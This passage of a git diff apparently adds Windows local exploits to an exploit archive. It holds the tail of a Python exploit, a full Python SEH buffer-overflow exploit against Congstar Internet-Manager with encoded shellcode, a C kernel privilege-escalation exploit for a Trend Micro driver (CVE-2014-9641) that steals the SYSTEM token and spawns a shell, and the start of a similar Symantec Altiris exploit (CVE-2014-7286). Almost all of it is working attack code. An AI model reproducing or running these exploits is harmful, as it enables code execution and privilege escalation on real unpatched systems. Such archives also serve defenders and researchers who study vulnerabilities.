+"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
+"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
+"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
+"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
+"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
+"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
+"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
+"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
+"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
+"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
+"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
+"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
+"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
+"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
+"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
+"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
+"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
+"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
+"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
+"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
+"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
+"\x43\x30\x41\x41")
+header  = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x0a"
+header += "\x0a\x55\x50\x44\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x0a\x0a\x5b\x53\x65\x72\x76\x69"
+header += "\x63\x65\x5d\x0a\x0a\x0a\x0a\x6d\x65\x74\x61\x63\x6f\x6d\x3d\x74\x77\x69\x74\x74\x65\x72\x2e\x63\x6f\x6d\x2f\x6d\x33\x74"
+header += "\x61\x63\x30\x6d\x0a\x0a\x0a\x0a\x53\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
+header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73"
+header += "\x70\x78\x0a\x0a\x0a\x0a\x55\x70\x64\x61\x74\x65\x52\x65\x70\x6f\x72\x74\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f"
+header += "\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x52\x65\x73\x75\x6c\x74\x52\x65"
+header += "\x70\x6f\x72\x74\x2e\x61\x73\x70\x78"+junk+nseh+seh+nops+shellcode+'\n\n'
+footer  = "\x0a\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48"
+footer += "\x3d\x2e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33"
+footer += "\x30\x30\x0a\x0a\x0a\x0a\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54"
+footer += "\x5f\x54\x49\x4d\x45\x4f\x55\x54\x3d\x32\x30\x0a\x0a\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x0a"
+footer += "\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53\x79\x73\x3d\x31\x0a" 
+exploit =  header + footer
+filename = "UpdateCfg.ini"
+file = open(filename , "w")
+file.write(exploit)
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/local/35813.py b/platforms/windows/local/35813.py
new file mode 100755
index 000000000..a42808b0b
--- /dev/null
+++ b/platforms/windows/local/35813.py
@@ -0,0 +1,69 @@
+#!/usr/bin/python
+#Exploit Title:Congstar Internet-Manager SEH Buffer Overflow 
+#Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100)
+#Homepage:www.congstar.de/downloads/prepaid-internet-stick/
+#Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip
+#Version:14.0.0.162
+#Found:8.01.2015
+#Exploit Author: metacom - twitter.com/m3tac0m
+#Tested on: Windows 7 En
+print "[*]Copy UpdateCfg.ini to C:\Program Files\congstar\Internetmanager\Bin\n"
+print "[*]Open Program and go to Menu-Options \n"
+print "[*]Click Update and press Now look for Update\n"
+print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen\n"
+from struct import pack
+buffer1 = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x55\x50\x44"
+buffer1 += "\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x5b\x53\x65\x72\x76\x69\x63\x65\x5d\x0a\x0a\x53"
+buffer1 += "\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e"
+buffer1 += "\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73\x70\x78\x0a"
+junk="\x41" * 18164
+nseh="\xeb\x06\x90\x90" 
+seh=pack('<I',0x7C3A1868)#7C3A1868
+nops="\x90" * 100
+#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
+#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
+shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
+"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
+"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
+"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
+"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
+"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
+"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
+"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
+"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
+"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
+"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
+"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
+"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
+"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
+"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
+"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
+"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
+"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
+"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
+"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
+"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
+"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
+"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
+"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
+"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
+"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
+"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
+"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
+"\x43\x30\x41\x41")
+poc="\n" + "UpdateReport" + "=" + junk + nseh + seh + nops + shellcode +"\n\n"
+buffer2 = "\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48\x3d\x2e"
+buffer2 += "\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33\x30\x30\x0a\x0a"
+buffer2 += "\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54\x5f\x54\x49\x4d\x45\x4f\x55\x54"
+buffer2 += "\x3d\x32\x30\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53"
+buffer2 += "\x79\x73\x3d\x31\x0a"
+exploit =  buffer1 + poc + buffer2
+try:
+    out_file = open("UpdateCfg.ini",'w')
+    out_file.write(exploit)
+    out_file.close()
+except:
+    print "Error"
\ No newline at end of file
diff --git a/platforms/windows/local/35962.c b/platforms/windows/local/35962.c
new file mode 100755
index 000000000..8edd561f5
--- /dev/null
+++ b/platforms/windows/local/35962.c
@@ -0,0 +1,302 @@
+?/*
+
+Exploit Title    - Trend Micro Multiple Products Arbitrary Write Privilege Escalation
+Date             - 31st January 2015
+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - http://www.trendmicro.co.uk/
+Tested Version   - 8.0.1133
+Driver Version   - 2.0.0.1009 - tmeext.sys
+Tested on OS     - 32bit Windows XP SP3 
+OSVDB            - http://www.osvdb.org/show/osvdb/115514
+CVE ID           - CVE-2014-9641
+Vendor fix url   - http://esupport.trendmicro.com/solution/en-US/1106233.aspx
+Fixed version    - 8.0.1133
+Fixed driver ver - 2.0.0.1015
+
+*/
+
+
+#include <stdio.h>
+#include <windows.h>
+
+#define BUFSIZE 4096
+
+
+typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
+     PVOID   Unknown1;
+     PVOID   Unknown2;
+     PVOID   Base;
+     ULONG   Size;
+     ULONG   Flags;
+     USHORT  Index;
+     USHORT  NameLength;
+     USHORT  LoadCount;
+     USHORT  PathLength;
+     CHAR    ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
+ 
+typedef struct _SYSTEM_MODULE_INFORMATION {
+     ULONG   Count;
+     SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+typedef enum _SYSTEM_INFORMATION_CLASS { 
+     SystemModuleInformation = 11,
+     SystemHandleInformation = 16
+} SYSTEM_INFORMATION_CLASS;
+
+typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
+     SYSTEM_INFORMATION_CLASS SystemInformationClass,
+     PVOID SystemInformation,
+     ULONG SystemInformationLength,
+     PULONG ReturnLength);
+
+typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
+     DWORD ProfileSource, 
+     PULONG Interval);
+
+typedef void (*FUNCTPTR)(); 
+
+
+
+// Windows XP SP3
+
+#define XP_KPROCESS 0x44      // Offset to _KPROCESS from a _ETHREAD struct
+#define XP_TOKEN    0xc8      // Offset to TOKEN from the _EPROCESS struct
+#define XP_UPID     0x84      // Offset to UniqueProcessId FROM the _EPROCESS struct
+#define XP_APLINKS  0x88      // Offset to ActiveProcessLinks _EPROCESS struct
+
+
+BYTE token_steal_xp[] =
+{
+  0x52,                                                  // push edx                       Save edx on the stack
+  0x53,	                                                 // push ebx                       Save ebx on the stack
+  0x33,0xc0,                                             // xor eax, eax                   eax = 0
+  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]         Retrieve ETHREAD
+  0x8b,0x40,XP_KPROCESS,                                 // mov eax, [eax+XP_KPROCESS]     Retrieve _KPROCESS
+  0x8b,0xc8,                                             // mov ecx, eax
+  0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+XP_TOKEN]        Retrieves TOKEN
+  0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+XP_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
+  0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                   // sub eax, XP_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+  0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+XP_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
+  0x75,0xe8,                                             // jne                     ---- 
+  0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+XP_TOKEN]        Retrieves TOKEN and stores on EDX
+  0x8b,0xc1,                                             // mov eax, ecx                   Retrieves KPROCESS stored on ECX
+  0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov [eax+XP_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
+  0x5b,                                                  // pop ebx                        Restores ebx
+  0x5a,                                                  // pop edx                        Restores edx
+  0xc2,0x08                                              // ret 8                          Away from the kernel    
+};
+
+
+
+DWORD HalDispatchTableAddress() 
+{
+    _NtQuerySystemInformation    NtQuerySystemInformation;
+    PSYSTEM_MODULE_INFORMATION   pModuleInfo;
+    DWORD                        HalDispatchTable;
+    CHAR                         kFullName[256];
+    PVOID                        kBase = NULL;
+    LPSTR                        kName;
+    HMODULE                      Kernel;
+    FUNCTPTR                     Hal;
+    ULONG                        len;
+    NTSTATUS                     status;
+
+
+    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
+ 	
+    if (!NtQuerySystemInformation)
+    {
+        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
+        return -1;  
+    }
+
+    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
+
+    if (!status) 
+    {
+        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
+        return -1;
+    }
+		
+    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
+
+    if(pModuleInfo == NULL)
+    {
+        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
+        return -1;
+    }
+
+    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
+	
+    memset(kFullName, 0x00, sizeof(kFullName));
+    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
+    kBase = pModuleInfo->Module[0].Base;
+
+    printf("[i] Kernel base name %s\n", kFullName);
+    kName = strrchr(kFullName, '\\');
+
+    Kernel = LoadLibraryA(++kName);
+
+    if(Kernel == NULL) 
+    {
+        printf("[-] Failed to load kernel base\n\n");
+        return -1;
+    }
+
+    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
+
+    if(Hal == NULL)
+    {
+        printf("[-] Failed to find HalDispatchTable\n\n");
+        return -1;
+    }
+    
+    printf("[i] HalDispatchTable address 0x%08x\n", Hal);	
+    printf("[i] Kernel handle 0x%08x\n", Kernel);
+    printf("[i] Kernel base address 0x%08x\n", kBase);          
+
+    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
+
+    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
+
+    if(!HalDispatchTable)
+    {
+        printf("[-] Failed to calculate HalDispatchTable\n\n");
+	return -1;
+    }
+
+    return HalDispatchTable;
+}
+
+
+int GetWindowsVersion()
+{
+    int v = 0;
+    DWORD version = 0, minVersion = 0, majVersion = 0;
+
+    version = GetVersion();
+
+    minVersion = (DWORD)(HIBYTE(LOWORD(version)));
+    majVersion = (DWORD)(LOBYTE(LOWORD(version)));
+
+    if (minVersion == 1 && majVersion == 5) v = 1;  // "Windows XP;
+    if (minVersion == 1 && majVersion == 6) v = 2;  // "Windows 7";
+    if (minVersion == 2 && majVersion == 5) v = 3;  // "Windows Server 2003;
+
+    return v;
+}
+
+
+void spawnShell()
+{
+    STARTUPINFOA si;
+    PROCESS_INFORMATION pi;
+
+
+    ZeroMemory(&pi, sizeof(pi));
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+
+    si.cb          = sizeof(si); 
+    si.dwFlags     = STARTF_USESHOWWINDOW;
+    si.wShowWindow = SW_SHOWNORMAL;
+
+    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
+    {
+        printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
+        return;
+    }
+
+    CloseHandle(pi.hThread);
+    CloseHandle(pi.hProcess);
+}
+
+
+int main(int argc, char *argv[]) 
+{
+
+    _NtQueryIntervalProfile     NtQueryIntervalProfile;
+    LPVOID                      input[1] = {0};    
+    LPVOID                      addrtoshell;
+    HANDLE                      hDevice;
+    DWORD                       dwRetBytes = 0;
+    DWORD                       HalDispatchTableTarget;               
+    ULONG                       time = 0;
+    unsigned char               devhandle[MAX_PATH]; 
+
+
+
+    printf("-------------------------------------------------------------------------------\n");
+    printf("    Trend Micro Multiple Products (tmeext.sys) Arbitrary Write EoP Exploit     \n");
+    printf("                         Tested on Windows XP SP3 (32bit)                      \n");
+    printf("-------------------------------------------------------------------------------\n\n");
+
+    if (GetWindowsVersion() == 1) 
+    {
+        printf("[i] Running Windows XP\n");
+    }
+
+    if (GetWindowsVersion() == 0) 
+    {
+        printf("[i] Exploit not supported on this OS\n\n");
+        return -1;
+    }  
+
+    sprintf(devhandle, "\\\\.\\%s", "tmnethk");
+
+    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
+ 	
+    if (!NtQueryIntervalProfile)
+    {
+        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
+        return -1;  
+    }
+   
+    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+    if(addrtoshell == NULL)
+    {
+        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
+        return -1;
+    }
+    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
+
+    memset(addrtoshell, 0x90, BUFSIZE);
+    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
+    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if (hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
+        return -1;
+    }
+    else 
+    {
+        printf("[+] Open %s device successful\n", devhandle);
+    }
+
+    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
+    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
+
+    input[0] = addrtoshell;  // input buffer contents gets written to our output buffer address
+                    
+    printf("[+] Input buffer contents %08x\n", input[0]);
+ 	
+    printf("[~] Press any key to send Exploit  . . .\n");
+    getch();
+
+    DeviceIoControl(hDevice, 0x00222400, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
+
+    printf("[+] Buffer sent\n");
+    CloseHandle(hDevice);
+
+    printf("[+] Spawning SYSTEM Shell\n");
+    NtQueryIntervalProfile(2, &time);
+    spawnShell();
+
+    return 0;
+}
diff --git a/platforms/windows/local/35964.c b/platforms/windows/local/35964.c
new file mode 100755
index 000000000..22c9427b3
--- /dev/null
+++ b/platforms/windows/local/35964.c
@@ -0,0 +1,384 @@
+?/*
+
+Exploit Title    - Symantec Altiris Agent Arbitrary Write Privilege Escalation
+Date             - 01st February 2015
+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - http://www.symantec.com
+Tested Version   - 6.9 (Build 648)
+Driver Version   - No version set - AlKernel.sys
+Tested on OS     - 32bit Windows XP SP3 and Windows Server 2003 SP2 
+OSVDB            - http://www.osvdb.org/show/osvdb/116082
+CVE ID           - CVE-2014-7286
+Vendor fix url   - http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141219_00
+Fixed version    - To remove driver
+Fixed driver ver - n/a
+
+
+
+Note
+----
+Overwritten HAL dispatch table after exploit 
+
+kd> dps nt!HalDispatchTable l c
+8054ccb8  00000003
+8054ccbc  746f6353
+8054ccc0  6f725774
+8054ccc4  68546574
+8054ccc8  00217369
+8054cccc  8050ac4d nt!HalExamineMBR
+8054ccd0  805c6f89 nt!IoAssignDriveLetters
+8054ccd4  805c4ae5 nt!IoReadPartitionTable
+8054ccd8  80613f7b nt!IoSetPartitionInformation
+8054ccdc  806141ef nt!IoWritePartitionTable
+8054cce0  8052d157 nt!CcHasInactiveViews
+8054cce4  804e42d1 nt!ObpTraceDepth+0x19
+
+
+4 pointers are overwritten with the hardcoded string "ScottWroteThis!" set in the driver.
+
+The driver looks like has one main task is to retrieve configuration information about 
+the hardware using the HalGetBusData function.  If it cannot retrieve configuration 
+information it sends the "ScottWroteThis!" string to the output buffer.
+
+Also to point out the driver is not signed, no file version set, no product version set,
+no product name set.
+
+Question about the string ""ScottWroteThis!" was posted online in 2006
+
+http://mygreenpaste.blogspot.co.uk/2006/06/beam-me-up-scotty.html
+
+*/
+
+
+#include <stdio.h>
+#include <windows.h>
+
+#define INBUFSIZE 16
+#define BUFSIZE 4096
+
+
+typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
+     PVOID   Unknown1;
+     PVOID   Unknown2;
+     PVOID   Base;
+     ULONG   Size;
+     ULONG   Flags;
+     USHORT  Index;
+     USHORT  NameLength;
+     USHORT  LoadCount;
+     USHORT  PathLength;
+     CHAR    ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
+ 
+typedef struct _SYSTEM_MODULE_INFORMATION {
+     ULONG   Count;
+     SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+typedef enum _SYSTEM_INFORMATION_CLASS { 
+     SystemModuleInformation = 11,
+     SystemHandleInformation = 16
+} SYSTEM_INFORMATION_CLASS;
+
+typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
+     SYSTEM_INFORMATION_CLASS SystemInformationClass,
+     PVOID SystemInformation,
+     ULONG SystemInformationLength,
+     PULONG ReturnLength);
+
+typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
+     DWORD ProfileSource, 
+     PULONG Interval);
+
+typedef void (*FUNCTPTR)(); 
+
+
+
+// Windows XP SP3
+
+#define XP_KPROCESS 0x44      // Offset to _KPROCESS from a _ETHREAD struct
+#define XP_TOKEN    0xc8      // Offset to TOKEN from the _EPROCESS struct
+#define XP_UPID     0x84      // Offset to UniqueProcessId FROM the _EPROCESS struct
+#define XP_APLINKS  0x88      // Offset to ActiveProcessLinks _EPROCESS struct
+
+// Windows Server 2003
+
+#define W2K3_KPROCESS 0x38      // Offset to _KPROCESS from a _ETHREAD struct
+#define W2K3_TOKEN    0xd8      // Offset to TOKEN from the _EPROCESS struct
+#define W2K3_UPID     0x94      // Offset to UniqueProcessId FROM the _EPROCESS struct
+#define W2K3_APLINKS  0x98      // Offset to ActiveProcessLinks _EPROCESS struct
+
+
+BYTE token_steal_xp[] =
+{
+  0x52,                                                  // push edx                       Save edx on the stack
+  0x53,	                                                 // push ebx                       Save ebx on the stack
+  0x33,0xc0,                                             // xor eax, eax                   eax = 0
+  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]         Retrieve ETHREAD
+  0x8b,0x40,XP_KPROCESS,                                 // mov eax, [eax+XP_KPROCESS]     Retrieve _KPROCESS
+  0x8b,0xc8,                                             // mov ecx, eax
+  0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+XP_TOKEN]        Retrieves TOKEN
+  0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+XP_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
+  0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                   // sub eax, XP_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+  0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+XP_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
+  0x75,0xe8,                                             // jne                     ---- 
+  0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+XP_TOKEN]        Retrieves TOKEN and stores on EDX
+  0x8b,0xc1,                                             // mov eax, ecx                   Retrieves KPROCESS stored on ECX
+  0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov [eax+XP_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
+  0x5b,                                                  // pop ebx                        Restores ebx
+  0x5a,                                                  // pop edx                        Restores edx
+  0xc2,0x08                                              // ret 8                          Away from the kernel                           
+};
+
+
+BYTE token_steal_w2k3[] =
+{
+  0x52,                                                  // push edx                         Save edx on the stack
+  0x53,                                                  // push ebx                         Save ebx on the stack
+  0x33,0xc0,                                             // xor eax, eax                     eax = 0
+  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]           Retrieve ETHREAD
+  0x8b,0x40,W2K3_KPROCESS,                               // mov eax, [eax+W2K3_KPROCESS]     Retrieve _KPROCESS
+  0x8b,0xc8,                                             // mov ecx, eax
+  0x8b,0x98,W2K3_TOKEN,0x00,0x00,0x00,                   // mov ebx, [eax+W2K3_TOKEN]        Retrieves TOKEN
+  0x8b,0x80,W2K3_APLINKS,0x00,0x00,0x00,                 // mov eax, [eax+W2K3_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
+  0x81,0xe8,W2K3_APLINKS,0x00,0x00,0x00,                 // sub eax, W2K3_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+  0x81,0xb8,W2K3_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+W2K3_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
+  0x75,0xe8,                                             // jne                       ---- 
+  0x8b,0x90,W2K3_TOKEN,0x00,0x00,0x00,                   // mov edx, [eax+W2K3_TOKEN]        Retrieves TOKEN and stores on EDX
+  0x8b,0xc1,                                             // mov eax, ecx                     Retrieves KPROCESS stored on ECX
+  0x89,0x90,W2K3_TOKEN,0x00,0x00,0x00,                   // mov [eax+W2K3_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
+  0x5b,                                                  // pop ebx                          Restores ebx
+  0x5a,                                                  // pop edx                          Restores edx
+  0xc2,0x08                                              // ret 8                            Away from the kernel
+};
